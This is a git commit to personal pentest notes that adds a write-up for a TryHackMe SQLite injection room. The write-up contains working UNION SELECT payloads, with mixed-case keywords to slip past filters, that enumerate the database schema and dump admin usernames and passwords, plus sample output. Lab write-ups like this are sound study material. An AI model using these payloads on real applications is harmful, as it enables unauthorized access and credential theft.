sql light manual injection notes added

BhattJayD · BhattJayD · commit 2c322c917faa · 2025-01-21T19:28:20.000+05:30
diff --git a/.obsidian/workspace.json b/.obsidian/workspace.json
@@ -55,12 +55,12 @@
             "state": {
               "type": "markdown",
               "state": {
-                "file": "Linux/Useful thing to look for.md",
+                "file": "SQL_Injection/DVWA_Easy_Manualy_Dump.md",
                 "mode": "source",
                 "source": false
               },
               "icon": "lucide-file",
-              "title": "Useful thing to look for"
+              "title": "DVWA_Easy_Manualy_Dump"
             }
           },
           {
@@ -233,15 +233,18 @@
   },
   "active": "bf9871c3a709dfe0",
   "lastOpenFiles": [
-    "SSTI.md",
+    "SQL_Injection/SQL Light Injection.md",
+    "SQL_Injection/Images/SQL_LIGHT_SELECT.png",
+    "Rev_Shell.md",
+    "SQL_Injection/DVWA_Easy_Manualy_Dump.md",
     "Linux/Useful thing to look for.md",
+    "SSTI.md",
     "Linux",
     "FUZZING.md",
     "README.md",
     "Privesc/Privesc.md",
     "ShellStabilize.md",
     "SQL_Injection/Images/DVWA_MEDIUM_DATA_DUMP.png",
-    "SQL_Injection/DVWA_Easy_Manualy_Dump.md",
     "Privesc/Images/rubyCapChown.png",
     "Privesc/Images/ansiblePrivesc02.png",
     "Privesc/Images/ttypushback01.png",
@@ -263,7 +266,6 @@
     "SQL_Injection/README.md",
     "SQL_Injection/DVWA_Medium_Manualy_Dump.md",
     "SQL_Injection/Images/DVWA_MEDIUM_TABLE_COLUMN_NAME.png",
-    "SQL_Injection/Images/DVWA_MEDIUM_COLUMN_NAME.png",
     "DockerBasics/Docker basics.md",
     "PrototypePollution/Prototype Population.md",
     "Crasking.md",
diff --git a/SQL_Injection/Images/SQL_LIGHT_SELECT.png b/SQL_Injection/Images/SQL_LIGHT_SELECT.png
diff --git a/SQL_Injection/SQL Light Injection.md b/SQL_Injection/SQL Light Injection.md
@@ -0,0 +1,47 @@
+Ref:- 
+1. https://tryhackme.com/r/room/lightroom
+2. https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/SQLite%20Injection.md
+### Union operation
+
+```sql
+Please enter your username: admin
+Username not found.
+Please enter your username: admin' UnIoN SeLeCt 1'
+Password: 1
+Please enter your username: admin' UnIoN SeLeCt 1,2'
+Error: SELECTs to the left and right of UNION do not have the same number of result columns
+```
+
+### Extract Database Structure
+
+```sql
+ a' UnIoN SeLeCt group_concat(sql) from sqlite_master'
+```
+
+or 
+
+```sql
+ a' UnIoN SeLeCt group_concat(sql) from sqlite_schema'
+```
+
+output :-
+```
+		Password:  CREATE TABLE usertable (
+                   id INTEGER PRIMARY KEY,
+                   username TEXT,
+                   password INTEGER
+                   ),
+                   CREATE TABLE admintable (
+                   id INTEGER PRIMARY KEY,
+                   username TEXT,
+                   password INTEGER
+                   )
+```
+
+### Extract DB info
+
+```sql
+a' UnIoN SeLeCt GROUP_CONCAT('|' || username || ':' || password || '|') FROM admintable'
+```
+
+![SQL_LIGHT_SELECT.png](Images/SQL_LIGHT_SELECT.png)
